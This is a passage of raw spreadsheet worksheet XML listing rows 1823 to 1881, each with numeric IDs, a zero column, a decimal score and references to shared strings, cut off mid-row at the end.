    </row>
    <row r="1823" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1823" s="1">
        <v>1821</v>
      </c>
      <c r="B1823">
        <v>5377</v>
      </c>
      <c r="C1823">
        <v>5377</v>
      </c>
      <c r="D1823">
        <v>0</v>
      </c>
      <c r="E1823">
        <v>0.72460001707077026</v>
      </c>
      <c r="F1823" t="s">
        <v>7</v>
      </c>
      <c r="G1823" t="s">
        <v>3601</v>
      </c>
      <c r="H1823" t="s">
        <v>3602</v>
      </c>
    </row>
    <row r="1824" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1824" s="1">
        <v>1822</v>
      </c>
      <c r="B1824">
        <v>368</v>
      </c>
      <c r="C1824">
        <v>368</v>
      </c>
      <c r="D1824">
        <v>0</v>
      </c>
      <c r="E1824">
        <v>0.47209998965263372</v>
      </c>
      <c r="F1824" t="s">
        <v>7</v>
      </c>
      <c r="G1824" t="s">
        <v>3603</v>
      </c>
      <c r="H1824" t="s">
        <v>3604</v>
      </c>
    </row>
    <row r="1825" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1825" s="1">
        <v>1823</v>
      </c>
      <c r="B1825">
        <v>1273</v>
      </c>
      <c r="C1825">
        <v>1273</v>
      </c>
      <c r="D1825">
        <v>0</v>
      </c>
      <c r="E1825">
        <v>0.92369997501373291</v>
      </c>
      <c r="F1825" t="s">
        <v>7</v>
      </c>
      <c r="G1825" t="s">
        <v>3605</v>
      </c>
      <c r="H1825" t="s">
        <v>3606</v>
      </c>
    </row>
    <row r="1826" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1826" s="1">
        <v>1824</v>
      </c>
      <c r="B1826">
        <v>5569</v>
      </c>
      <c r="C1826">
        <v>5569</v>
      </c>
      <c r="D1826">
        <v>0</v>
      </c>
      <c r="E1826">
        <v>0.99949997663497925</v>
      </c>
      <c r="F1826" t="s">
        <v>7</v>
      </c>
      <c r="G1826" t="s">
        <v>3607</v>
      </c>
      <c r="H1826" t="s">
        <v>3608</v>
      </c>
    </row>
    <row r="1827" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1827" s="1">
        <v>1825</v>
      </c>
      <c r="B1827">
        <v>5388</v>
      </c>
      <c r="C1827">
        <v>5388</v>
      </c>
      <c r="D1827">
        <v>0</v>
      </c>
      <c r="E1827">
        <v>0.9603000283241272</v>
      </c>
      <c r="F1827" t="s">
        <v>7</v>
      </c>
      <c r="G1827" t="s">
        <v>3609</v>
      </c>
      <c r="H1827" t="s">
        <v>3610</v>
      </c>
    </row>
    <row r="1828" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1828" s="1">
        <v>1826</v>
      </c>
      <c r="B1828">
        <v>5387</v>
      </c>
      <c r="C1828">
        <v>5387</v>
      </c>
      <c r="D1828">
        <v>0</v>
      </c>
      <c r="E1828">
        <v>0.99709999561309814</v>
      </c>
      <c r="F1828" t="s">
        <v>7</v>
      </c>
      <c r="G1828" t="s">
        <v>3611</v>
      </c>
      <c r="H1828" t="s">
        <v>3612</v>
      </c>
    </row>
    <row r="1829" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1829" s="1">
        <v>1827</v>
      </c>
      <c r="B1829">
        <v>378</v>
      </c>
      <c r="C1829">
        <v>378</v>
      </c>
      <c r="D1829">
        <v>0</v>
      </c>
      <c r="E1829">
        <v>0.76260000467300415</v>
      </c>
      <c r="F1829" t="s">
        <v>7</v>
      </c>
      <c r="G1829" t="s">
        <v>3613</v>
      </c>
      <c r="H1829" t="s">
        <v>3614</v>
      </c>
    </row>
    <row r="1830" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1830" s="1">
        <v>1828</v>
      </c>
      <c r="B1830">
        <v>379</v>
      </c>
      <c r="C1830">
        <v>379</v>
      </c>
      <c r="D1830">
        <v>0</v>
      </c>
      <c r="E1830">
        <v>0.794700026512146</v>
      </c>
      <c r="F1830" t="s">
        <v>7</v>
      </c>
      <c r="G1830" t="s">
        <v>3615</v>
      </c>
      <c r="H1830" t="s">
        <v>3616</v>
      </c>
    </row>
    <row r="1831" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1831" s="1">
        <v>1829</v>
      </c>
      <c r="B1831">
        <v>375</v>
      </c>
      <c r="C1831">
        <v>375</v>
      </c>
      <c r="D1831">
        <v>0</v>
      </c>
      <c r="E1831">
        <v>0.55809998512268066</v>
      </c>
      <c r="F1831" t="s">
        <v>7</v>
      </c>
      <c r="G1831" t="s">
        <v>3617</v>
      </c>
      <c r="H1831" t="s">
        <v>3618</v>
      </c>
    </row>
    <row r="1832" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1832" s="1">
        <v>1830</v>
      </c>
      <c r="B1832">
        <v>374</v>
      </c>
      <c r="C1832">
        <v>374</v>
      </c>
      <c r="D1832">
        <v>0</v>
      </c>
      <c r="E1832">
        <v>0.54259997606277466</v>
      </c>
      <c r="F1832" t="s">
        <v>7</v>
      </c>
      <c r="G1832" t="s">
        <v>3619</v>
      </c>
      <c r="H1832" t="s">
        <v>3620</v>
      </c>
    </row>
    <row r="1833" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1833" s="1">
        <v>1831</v>
      </c>
      <c r="B1833">
        <v>1289</v>
      </c>
      <c r="C1833">
        <v>1289</v>
      </c>
      <c r="D1833">
        <v>0</v>
      </c>
      <c r="E1833">
        <v>0.99659997224807739</v>
      </c>
      <c r="F1833" t="s">
        <v>7</v>
      </c>
      <c r="G1833" t="s">
        <v>3621</v>
      </c>
      <c r="H1833" t="s">
        <v>3622</v>
      </c>
    </row>
    <row r="1834" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1834" s="1">
        <v>1832</v>
      </c>
      <c r="B1834">
        <v>1288</v>
      </c>
      <c r="C1834">
        <v>1288</v>
      </c>
      <c r="D1834">
        <v>0</v>
      </c>
      <c r="E1834">
        <v>0.41519999504089361</v>
      </c>
      <c r="F1834" t="s">
        <v>7</v>
      </c>
      <c r="G1834" t="s">
        <v>3623</v>
      </c>
      <c r="H1834" t="s">
        <v>3624</v>
      </c>
    </row>
    <row r="1835" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1835" s="1">
        <v>1833</v>
      </c>
      <c r="B1835">
        <v>5389</v>
      </c>
      <c r="C1835">
        <v>5389</v>
      </c>
      <c r="D1835">
        <v>0</v>
      </c>
      <c r="E1835">
        <v>0.80650001764297485</v>
      </c>
      <c r="F1835" t="s">
        <v>7</v>
      </c>
      <c r="G1835" t="s">
        <v>3625</v>
      </c>
      <c r="H1835" t="s">
        <v>3626</v>
      </c>
    </row>
    <row r="1836" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1836" s="1">
        <v>1834</v>
      </c>
      <c r="B1836">
        <v>386</v>
      </c>
      <c r="C1836">
        <v>386</v>
      </c>
      <c r="D1836">
        <v>0</v>
      </c>
      <c r="E1836">
        <v>0.43970000743865972</v>
      </c>
      <c r="F1836" t="s">
        <v>7</v>
      </c>
      <c r="G1836" t="s">
        <v>3627</v>
      </c>
      <c r="H1836" t="s">
        <v>3628</v>
      </c>
    </row>
    <row r="1837" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1837" s="1">
        <v>1835</v>
      </c>
      <c r="B1837">
        <v>5572</v>
      </c>
      <c r="C1837">
        <v>5572</v>
      </c>
      <c r="D1837">
        <v>0</v>
      </c>
      <c r="E1837">
        <v>0.88700002431869507</v>
      </c>
      <c r="F1837" t="s">
        <v>7</v>
      </c>
      <c r="G1837" t="s">
        <v>3629</v>
      </c>
      <c r="H1837" t="s">
        <v>3630</v>
      </c>
    </row>
    <row r="1838" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1838" s="1">
        <v>1836</v>
      </c>
      <c r="B1838">
        <v>7329</v>
      </c>
      <c r="C1838">
        <v>7329</v>
      </c>
      <c r="D1838">
        <v>0</v>
      </c>
      <c r="E1838">
        <v>0.51719999313354492</v>
      </c>
      <c r="F1838" t="s">
        <v>7</v>
      </c>
      <c r="G1838" t="s">
        <v>3631</v>
      </c>
      <c r="H1838" t="s">
        <v>3632</v>
      </c>
    </row>
    <row r="1839" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1839" s="1">
        <v>1837</v>
      </c>
      <c r="B1839">
        <v>5571</v>
      </c>
      <c r="C1839">
        <v>5571</v>
      </c>
      <c r="D1839">
        <v>0</v>
      </c>
      <c r="E1839">
        <v>0.82330000400543213</v>
      </c>
      <c r="F1839" t="s">
        <v>7</v>
      </c>
      <c r="G1839" t="s">
        <v>3633</v>
      </c>
      <c r="H1839" t="s">
        <v>3634</v>
      </c>
    </row>
    <row r="1840" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1840" s="1">
        <v>1838</v>
      </c>
      <c r="B1840">
        <v>5570</v>
      </c>
      <c r="C1840">
        <v>5570</v>
      </c>
      <c r="D1840">
        <v>0</v>
      </c>
      <c r="E1840">
        <v>0.51480001211166382</v>
      </c>
      <c r="F1840" t="s">
        <v>7</v>
      </c>
      <c r="G1840" t="s">
        <v>3635</v>
      </c>
      <c r="H1840" t="s">
        <v>3636</v>
      </c>
    </row>
    <row r="1841" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1841" s="1">
        <v>1839</v>
      </c>
      <c r="B1841">
        <v>385</v>
      </c>
      <c r="C1841">
        <v>385</v>
      </c>
      <c r="D1841">
        <v>0</v>
      </c>
      <c r="E1841">
        <v>0.49950000643730158</v>
      </c>
      <c r="F1841" t="s">
        <v>7</v>
      </c>
      <c r="G1841" t="s">
        <v>3637</v>
      </c>
      <c r="H1841" t="s">
        <v>3638</v>
      </c>
    </row>
    <row r="1842" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1842" s="1">
        <v>1840</v>
      </c>
      <c r="B1842">
        <v>7332</v>
      </c>
      <c r="C1842">
        <v>7332</v>
      </c>
      <c r="D1842">
        <v>0</v>
      </c>
      <c r="E1842">
        <v>0.78200000524520874</v>
      </c>
      <c r="F1842" t="s">
        <v>7</v>
      </c>
      <c r="G1842" t="s">
        <v>3639</v>
      </c>
      <c r="H1842" t="s">
        <v>3640</v>
      </c>
    </row>
    <row r="1843" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1843" s="1">
        <v>1841</v>
      </c>
      <c r="B1843">
        <v>1276</v>
      </c>
      <c r="C1843">
        <v>1276</v>
      </c>
      <c r="D1843">
        <v>0</v>
      </c>
      <c r="E1843">
        <v>0.99260002374649048</v>
      </c>
      <c r="F1843" t="s">
        <v>7</v>
      </c>
      <c r="G1843" t="s">
        <v>3641</v>
      </c>
      <c r="H1843" t="s">
        <v>3642</v>
      </c>
    </row>
    <row r="1844" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1844" s="1">
        <v>1842</v>
      </c>
      <c r="B1844">
        <v>7</v>
      </c>
      <c r="C1844">
        <v>7</v>
      </c>
      <c r="D1844">
        <v>0</v>
      </c>
      <c r="E1844">
        <v>0.57819998264312744</v>
      </c>
      <c r="F1844" t="s">
        <v>7</v>
      </c>
      <c r="G1844" t="s">
        <v>3643</v>
      </c>
      <c r="H1844" t="s">
        <v>3644</v>
      </c>
    </row>
    <row r="1845" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1845" s="1">
        <v>1843</v>
      </c>
      <c r="B1845">
        <v>4871</v>
      </c>
      <c r="C1845">
        <v>4871</v>
      </c>
      <c r="D1845">
        <v>0</v>
      </c>
      <c r="E1845">
        <v>0.8870999813079834</v>
      </c>
      <c r="F1845" t="s">
        <v>7</v>
      </c>
      <c r="G1845" t="s">
        <v>3645</v>
      </c>
      <c r="H1845" t="s">
        <v>3646</v>
      </c>
    </row>
    <row r="1846" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1846" s="1">
        <v>1844</v>
      </c>
      <c r="B1846">
        <v>7925</v>
      </c>
      <c r="C1846">
        <v>7925</v>
      </c>
      <c r="D1846">
        <v>0</v>
      </c>
      <c r="E1846">
        <v>0.57359999418258667</v>
      </c>
      <c r="F1846" t="s">
        <v>7</v>
      </c>
      <c r="G1846" t="s">
        <v>3647</v>
      </c>
      <c r="H1846" t="s">
        <v>3648</v>
      </c>
    </row>
    <row r="1847" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1847" s="1">
        <v>1845</v>
      </c>
      <c r="B1847">
        <v>4</v>
      </c>
      <c r="C1847">
        <v>4</v>
      </c>
      <c r="D1847">
        <v>0</v>
      </c>
      <c r="E1847">
        <v>0.55629998445510864</v>
      </c>
      <c r="F1847" t="s">
        <v>7</v>
      </c>
      <c r="G1847" t="s">
        <v>3649</v>
      </c>
      <c r="H1847" t="s">
        <v>3650</v>
      </c>
    </row>
    <row r="1848" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1848" s="1">
        <v>1846</v>
      </c>
      <c r="B1848">
        <v>5565</v>
      </c>
      <c r="C1848">
        <v>5565</v>
      </c>
      <c r="D1848">
        <v>0</v>
      </c>
      <c r="E1848">
        <v>0.99860000610351563</v>
      </c>
      <c r="F1848" t="s">
        <v>7</v>
      </c>
      <c r="G1848" t="s">
        <v>3651</v>
      </c>
      <c r="H1848" t="s">
        <v>3652</v>
      </c>
    </row>
    <row r="1849" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1849" s="1">
        <v>1847</v>
      </c>
      <c r="B1849">
        <v>17</v>
      </c>
      <c r="C1849">
        <v>17</v>
      </c>
      <c r="D1849">
        <v>0</v>
      </c>
      <c r="E1849">
        <v>0.5284000039100647</v>
      </c>
      <c r="F1849" t="s">
        <v>7</v>
      </c>
      <c r="G1849" t="s">
        <v>3653</v>
      </c>
      <c r="H1849" t="s">
        <v>3654</v>
      </c>
    </row>
    <row r="1850" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1850" s="1">
        <v>1848</v>
      </c>
      <c r="B1850">
        <v>18</v>
      </c>
      <c r="C1850">
        <v>18</v>
      </c>
      <c r="D1850">
        <v>0</v>
      </c>
      <c r="E1850">
        <v>0.65490001440048218</v>
      </c>
      <c r="F1850" t="s">
        <v>7</v>
      </c>
      <c r="G1850" t="s">
        <v>3655</v>
      </c>
      <c r="H1850" t="s">
        <v>3656</v>
      </c>
    </row>
    <row r="1851" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1851" s="1">
        <v>1849</v>
      </c>
      <c r="B1851">
        <v>1232</v>
      </c>
      <c r="C1851">
        <v>1232</v>
      </c>
      <c r="D1851">
        <v>0</v>
      </c>
      <c r="E1851">
        <v>0.99089998006820679</v>
      </c>
      <c r="F1851" t="s">
        <v>7</v>
      </c>
      <c r="G1851" t="s">
        <v>3657</v>
      </c>
      <c r="H1851" t="s">
        <v>3658</v>
      </c>
    </row>
    <row r="1852" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1852" s="1">
        <v>1850</v>
      </c>
      <c r="B1852">
        <v>5561</v>
      </c>
      <c r="C1852">
        <v>5561</v>
      </c>
      <c r="D1852">
        <v>0</v>
      </c>
      <c r="E1852">
        <v>0.92430001497268677</v>
      </c>
      <c r="F1852" t="s">
        <v>7</v>
      </c>
      <c r="G1852" t="s">
        <v>3659</v>
      </c>
      <c r="H1852" t="s">
        <v>1622</v>
      </c>
    </row>
    <row r="1853" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1853" s="1">
        <v>1851</v>
      </c>
      <c r="B1853">
        <v>5851</v>
      </c>
      <c r="C1853">
        <v>5851</v>
      </c>
      <c r="D1853">
        <v>0</v>
      </c>
      <c r="E1853">
        <v>0.7006000280380249</v>
      </c>
      <c r="F1853" t="s">
        <v>7</v>
      </c>
      <c r="G1853" t="s">
        <v>3660</v>
      </c>
      <c r="H1853" t="s">
        <v>3661</v>
      </c>
    </row>
    <row r="1854" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1854" s="1">
        <v>1852</v>
      </c>
      <c r="B1854">
        <v>25</v>
      </c>
      <c r="C1854">
        <v>25</v>
      </c>
      <c r="D1854">
        <v>0</v>
      </c>
      <c r="E1854">
        <v>0.48260000348091131</v>
      </c>
      <c r="F1854" t="s">
        <v>7</v>
      </c>
      <c r="G1854" t="s">
        <v>3662</v>
      </c>
      <c r="H1854" t="s">
        <v>1620</v>
      </c>
    </row>
    <row r="1855" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1855" s="1">
        <v>1853</v>
      </c>
      <c r="B1855">
        <v>5849</v>
      </c>
      <c r="C1855">
        <v>5849</v>
      </c>
      <c r="D1855">
        <v>0</v>
      </c>
      <c r="E1855">
        <v>0.47600001096725458</v>
      </c>
      <c r="F1855" t="s">
        <v>7</v>
      </c>
      <c r="G1855" t="s">
        <v>3663</v>
      </c>
      <c r="H1855" t="s">
        <v>3664</v>
      </c>
    </row>
    <row r="1856" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1856" s="1">
        <v>1854</v>
      </c>
      <c r="B1856">
        <v>5362</v>
      </c>
      <c r="C1856">
        <v>5362</v>
      </c>
      <c r="D1856">
        <v>0</v>
      </c>
      <c r="E1856">
        <v>0.93830001354217529</v>
      </c>
      <c r="F1856" t="s">
        <v>7</v>
      </c>
      <c r="G1856" t="s">
        <v>3665</v>
      </c>
      <c r="H1856" t="s">
        <v>3666</v>
      </c>
    </row>
    <row r="1857" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1857" s="1">
        <v>1855</v>
      </c>
      <c r="B1857">
        <v>1229</v>
      </c>
      <c r="C1857">
        <v>1229</v>
      </c>
      <c r="D1857">
        <v>0</v>
      </c>
      <c r="E1857">
        <v>0.89960002899169922</v>
      </c>
      <c r="F1857" t="s">
        <v>7</v>
      </c>
      <c r="G1857" t="s">
        <v>3667</v>
      </c>
      <c r="H1857" t="s">
        <v>3668</v>
      </c>
    </row>
    <row r="1858" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1858" s="1">
        <v>1856</v>
      </c>
      <c r="B1858">
        <v>1228</v>
      </c>
      <c r="C1858">
        <v>1228</v>
      </c>
      <c r="D1858">
        <v>0</v>
      </c>
      <c r="E1858">
        <v>0.92400002479553223</v>
      </c>
      <c r="F1858" t="s">
        <v>7</v>
      </c>
      <c r="G1858" t="s">
        <v>3669</v>
      </c>
      <c r="H1858" t="s">
        <v>3670</v>
      </c>
    </row>
    <row r="1859" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1859" s="1">
        <v>1857</v>
      </c>
      <c r="B1859">
        <v>7351</v>
      </c>
      <c r="C1859">
        <v>7351</v>
      </c>
      <c r="D1859">
        <v>0</v>
      </c>
      <c r="E1859">
        <v>0.96569997072219849</v>
      </c>
      <c r="F1859" t="s">
        <v>7</v>
      </c>
      <c r="G1859" t="s">
        <v>3671</v>
      </c>
      <c r="H1859" t="s">
        <v>3672</v>
      </c>
    </row>
    <row r="1860" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1860" s="1">
        <v>1858</v>
      </c>
      <c r="B1860">
        <v>5853</v>
      </c>
      <c r="C1860">
        <v>5853</v>
      </c>
      <c r="D1860">
        <v>0</v>
      </c>
      <c r="E1860">
        <v>0.99739998579025269</v>
      </c>
      <c r="F1860" t="s">
        <v>7</v>
      </c>
      <c r="G1860" t="s">
        <v>3673</v>
      </c>
      <c r="H1860" t="s">
        <v>3674</v>
      </c>
    </row>
    <row r="1861" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1861" s="1">
        <v>1859</v>
      </c>
      <c r="B1861">
        <v>5560</v>
      </c>
      <c r="C1861">
        <v>5560</v>
      </c>
      <c r="D1861">
        <v>0</v>
      </c>
      <c r="E1861">
        <v>0.61220002174377441</v>
      </c>
      <c r="F1861" t="s">
        <v>7</v>
      </c>
      <c r="G1861" t="s">
        <v>3675</v>
      </c>
      <c r="H1861" t="s">
        <v>3676</v>
      </c>
    </row>
    <row r="1862" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1862" s="1">
        <v>1860</v>
      </c>
      <c r="B1862">
        <v>5579</v>
      </c>
      <c r="C1862">
        <v>5579</v>
      </c>
      <c r="D1862">
        <v>0</v>
      </c>
      <c r="E1862">
        <v>0.50150001049041748</v>
      </c>
      <c r="F1862" t="s">
        <v>7</v>
      </c>
      <c r="G1862" t="s">
        <v>3677</v>
      </c>
      <c r="H1862" t="s">
        <v>3678</v>
      </c>
    </row>
    <row r="1863" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1863" s="1">
        <v>1861</v>
      </c>
      <c r="B1863">
        <v>5580</v>
      </c>
      <c r="C1863">
        <v>5580</v>
      </c>
      <c r="D1863">
        <v>0</v>
      </c>
      <c r="E1863">
        <v>0.49480000138282781</v>
      </c>
      <c r="F1863" t="s">
        <v>7</v>
      </c>
      <c r="G1863" t="s">
        <v>3679</v>
      </c>
      <c r="H1863" t="s">
        <v>3680</v>
      </c>
    </row>
    <row r="1864" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1864" s="1">
        <v>1862</v>
      </c>
      <c r="B1864">
        <v>5360</v>
      </c>
      <c r="C1864">
        <v>5360</v>
      </c>
      <c r="D1864">
        <v>0</v>
      </c>
      <c r="E1864">
        <v>0.99900001287460327</v>
      </c>
      <c r="F1864" t="s">
        <v>7</v>
      </c>
      <c r="G1864" t="s">
        <v>3681</v>
      </c>
      <c r="H1864" t="s">
        <v>844</v>
      </c>
    </row>
    <row r="1865" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1865" s="1">
        <v>1863</v>
      </c>
      <c r="B1865">
        <v>1221</v>
      </c>
      <c r="C1865">
        <v>1221</v>
      </c>
      <c r="D1865">
        <v>0</v>
      </c>
      <c r="E1865">
        <v>0.51709997653961182</v>
      </c>
      <c r="F1865" t="s">
        <v>7</v>
      </c>
      <c r="G1865" t="s">
        <v>3682</v>
      </c>
      <c r="H1865" t="s">
        <v>3683</v>
      </c>
    </row>
    <row r="1866" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1866" s="1">
        <v>1864</v>
      </c>
      <c r="B1866">
        <v>30</v>
      </c>
      <c r="C1866">
        <v>30</v>
      </c>
      <c r="D1866">
        <v>0</v>
      </c>
      <c r="E1866">
        <v>0.56470000743865967</v>
      </c>
      <c r="F1866" t="s">
        <v>7</v>
      </c>
      <c r="G1866" t="s">
        <v>3684</v>
      </c>
      <c r="H1866" t="s">
        <v>3685</v>
      </c>
    </row>
    <row r="1867" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1867" s="1">
        <v>1865</v>
      </c>
      <c r="B1867">
        <v>7909</v>
      </c>
      <c r="C1867">
        <v>7909</v>
      </c>
      <c r="D1867">
        <v>0</v>
      </c>
      <c r="E1867">
        <v>0.57429999113082886</v>
      </c>
      <c r="F1867" t="s">
        <v>7</v>
      </c>
      <c r="G1867" t="s">
        <v>3686</v>
      </c>
      <c r="H1867" t="s">
        <v>3687</v>
      </c>
    </row>
    <row r="1868" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1868" s="1">
        <v>1866</v>
      </c>
      <c r="B1868">
        <v>5358</v>
      </c>
      <c r="C1868">
        <v>5358</v>
      </c>
      <c r="D1868">
        <v>0</v>
      </c>
      <c r="E1868">
        <v>0.8629000186920166</v>
      </c>
      <c r="F1868" t="s">
        <v>7</v>
      </c>
      <c r="G1868" t="s">
        <v>3688</v>
      </c>
      <c r="H1868" t="s">
        <v>3689</v>
      </c>
    </row>
    <row r="1869" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1869" s="1">
        <v>1867</v>
      </c>
      <c r="B1869">
        <v>416</v>
      </c>
      <c r="C1869">
        <v>416</v>
      </c>
      <c r="D1869">
        <v>0</v>
      </c>
      <c r="E1869">
        <v>0.45550000667572021</v>
      </c>
      <c r="F1869" t="s">
        <v>7</v>
      </c>
      <c r="G1869" t="s">
        <v>3690</v>
      </c>
      <c r="H1869" t="s">
        <v>3691</v>
      </c>
    </row>
    <row r="1870" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1870" s="1">
        <v>1868</v>
      </c>
      <c r="B1870">
        <v>417</v>
      </c>
      <c r="C1870">
        <v>417</v>
      </c>
      <c r="D1870">
        <v>0</v>
      </c>
      <c r="E1870">
        <v>0.89829999208450317</v>
      </c>
      <c r="F1870" t="s">
        <v>7</v>
      </c>
      <c r="G1870" t="s">
        <v>3692</v>
      </c>
      <c r="H1870" t="s">
        <v>3693</v>
      </c>
    </row>
    <row r="1871" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1871" s="1">
        <v>1869</v>
      </c>
      <c r="B1871">
        <v>1225</v>
      </c>
      <c r="C1871">
        <v>1225</v>
      </c>
      <c r="D1871">
        <v>0</v>
      </c>
      <c r="E1871">
        <v>0.66490000486373901</v>
      </c>
      <c r="F1871" t="s">
        <v>7</v>
      </c>
      <c r="G1871" t="s">
        <v>3694</v>
      </c>
      <c r="H1871" t="s">
        <v>2631</v>
      </c>
    </row>
    <row r="1872" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1872" s="1">
        <v>1870</v>
      </c>
      <c r="B1872">
        <v>5363</v>
      </c>
      <c r="C1872">
        <v>5363</v>
      </c>
      <c r="D1872">
        <v>0</v>
      </c>
      <c r="E1872">
        <v>0.93839997053146362</v>
      </c>
      <c r="F1872" t="s">
        <v>7</v>
      </c>
      <c r="G1872" t="s">
        <v>3695</v>
      </c>
      <c r="H1872" t="s">
        <v>3666</v>
      </c>
    </row>
    <row r="1873" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1873" s="1">
        <v>1871</v>
      </c>
      <c r="B1873">
        <v>410</v>
      </c>
      <c r="C1873">
        <v>410</v>
      </c>
      <c r="D1873">
        <v>0</v>
      </c>
      <c r="E1873">
        <v>0.47440001368522638</v>
      </c>
      <c r="F1873" t="s">
        <v>7</v>
      </c>
      <c r="G1873" t="s">
        <v>3696</v>
      </c>
      <c r="H1873" t="s">
        <v>3697</v>
      </c>
    </row>
    <row r="1874" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1874" s="1">
        <v>1872</v>
      </c>
      <c r="B1874">
        <v>409</v>
      </c>
      <c r="C1874">
        <v>409</v>
      </c>
      <c r="D1874">
        <v>0</v>
      </c>
      <c r="E1874">
        <v>0.66909998655319214</v>
      </c>
      <c r="F1874" t="s">
        <v>7</v>
      </c>
      <c r="G1874" t="s">
        <v>3698</v>
      </c>
      <c r="H1874" t="s">
        <v>3699</v>
      </c>
    </row>
    <row r="1875" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1875" s="1">
        <v>1873</v>
      </c>
      <c r="B1875">
        <v>4883</v>
      </c>
      <c r="C1875">
        <v>4883</v>
      </c>
      <c r="D1875">
        <v>0</v>
      </c>
      <c r="E1875">
        <v>0.99199998378753662</v>
      </c>
      <c r="F1875" t="s">
        <v>7</v>
      </c>
      <c r="G1875" t="s">
        <v>3700</v>
      </c>
      <c r="H1875" t="s">
        <v>3701</v>
      </c>
    </row>
    <row r="1876" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1876" s="1">
        <v>1874</v>
      </c>
      <c r="B1876">
        <v>4884</v>
      </c>
      <c r="C1876">
        <v>4884</v>
      </c>
      <c r="D1876">
        <v>0</v>
      </c>
      <c r="E1876">
        <v>0.99260002374649048</v>
      </c>
      <c r="F1876" t="s">
        <v>7</v>
      </c>
      <c r="G1876" t="s">
        <v>3702</v>
      </c>
      <c r="H1876" t="s">
        <v>3703</v>
      </c>
    </row>
    <row r="1877" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1877" s="1">
        <v>1875</v>
      </c>
      <c r="B1877">
        <v>5564</v>
      </c>
      <c r="C1877">
        <v>5564</v>
      </c>
      <c r="D1877">
        <v>0</v>
      </c>
      <c r="E1877">
        <v>0.95910000801086426</v>
      </c>
      <c r="F1877" t="s">
        <v>7</v>
      </c>
      <c r="G1877" t="s">
        <v>3704</v>
      </c>
      <c r="H1877" t="s">
        <v>3705</v>
      </c>
    </row>
    <row r="1878" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1878" s="1">
        <v>1876</v>
      </c>
      <c r="B1878">
        <v>7343</v>
      </c>
      <c r="C1878">
        <v>7343</v>
      </c>
      <c r="D1878">
        <v>0</v>
      </c>
      <c r="E1878">
        <v>0.803600013256073</v>
      </c>
      <c r="F1878" t="s">
        <v>7</v>
      </c>
      <c r="G1878" t="s">
        <v>3706</v>
      </c>
      <c r="H1878" t="s">
        <v>3707</v>
      </c>
    </row>
    <row r="1879" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1879" s="1">
        <v>1877</v>
      </c>
      <c r="B1879">
        <v>5662</v>
      </c>
      <c r="C1879">
        <v>5662</v>
      </c>
      <c r="D1879">
        <v>0</v>
      </c>
      <c r="E1879">
        <v>0.93209999799728394</v>
      </c>
      <c r="F1879" t="s">
        <v>7</v>
      </c>
      <c r="G1879" t="s">
        <v>3708</v>
      </c>
      <c r="H1879" t="s">
        <v>3709</v>
      </c>
    </row>
    <row r="1880" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1880" s="1">
        <v>1878</v>
      </c>
      <c r="B1880">
        <v>7741</v>
      </c>
      <c r="C1880">
        <v>7741</v>
      </c>
      <c r="D1880">
        <v>0</v>
      </c>
      <c r="E1880">
        <v>0.59530001878738403</v>
      </c>
      <c r="F1880" t="s">
        <v>7</v>
      </c>
      <c r="G1880" t="s">
        <v>3710</v>
      </c>
      <c r="H1880" t="s">
        <v>3711</v>
      </c>
    </row>
    <row r="1881" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1881" s="1">
        <v>1879</v>
      </c>
      <c r="B1881">
        <v>4891</v>
      </c>
      <c r="C1881">
        <v>4891</v>
      </c>
      <c r="D1881">
        <v>0</v>
      </c>
      <c r="E1881">
        <v>0.99629998207092285</v>
      </c>
      <c r="F1881" t="s">
